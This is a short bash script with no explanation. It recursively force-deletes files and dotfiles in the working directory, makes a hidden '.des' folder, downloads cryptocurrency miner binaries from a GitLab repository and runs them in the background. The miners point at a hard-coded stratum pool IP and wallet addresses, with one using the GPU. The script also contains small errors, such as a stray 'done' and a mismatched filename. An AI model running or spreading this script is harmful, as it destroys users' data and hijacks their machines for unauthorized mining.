#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.98.18:443 -u us13TQht7hLRLLQPFyjUwQBRjUtMnTjbHN.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/_gram-mining-pool && chmod +x ._gram-mining-pool
wget https://gitlab.com/majapahlevi/mvp/-/raw/main/garem && chmod +x garem
./garem --address UQD9cZUHLFxZommtxjGKBX4DObtC_9zvp-MYduOi5nqLDR2g --gpu-auto --miner cuda

done
